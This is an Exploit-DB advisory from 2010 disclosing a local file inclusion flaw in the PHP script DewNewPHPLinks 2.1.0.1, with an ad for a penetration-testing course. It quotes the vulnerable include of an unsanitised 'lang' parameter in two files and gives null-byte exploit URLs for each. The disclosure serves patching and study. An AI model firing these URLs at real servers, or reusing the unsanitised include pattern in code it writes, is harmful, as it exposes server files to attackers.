DewNewPHPLinks 2.1.0.1 - Local File Inclusion

EDB-ID:

11795

CVE:

N/A




Platform:

PHP

Date:

2010-03-18


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#########################local file include#################
Author: ItSecTeam

download from:http://www.dew-code.com/components/com_jooget/file/dew-newphplinks.v.2.1.0.1b.sef.zip

script:DewNewPHPLinks 2.1.0.1

*********************lfi*******************
vul1:/path/docs/add-cats.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
----------
vul2:/path/docs/dbupdate.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");

--------------------------------------------

xpl lfi:/path/docs/add-cats.php?lang=[lfi]%00
xpl lfi:/path/docs/dbupdate.php?lang=[lfi]%00
########################

discovered by ahmadbady

########################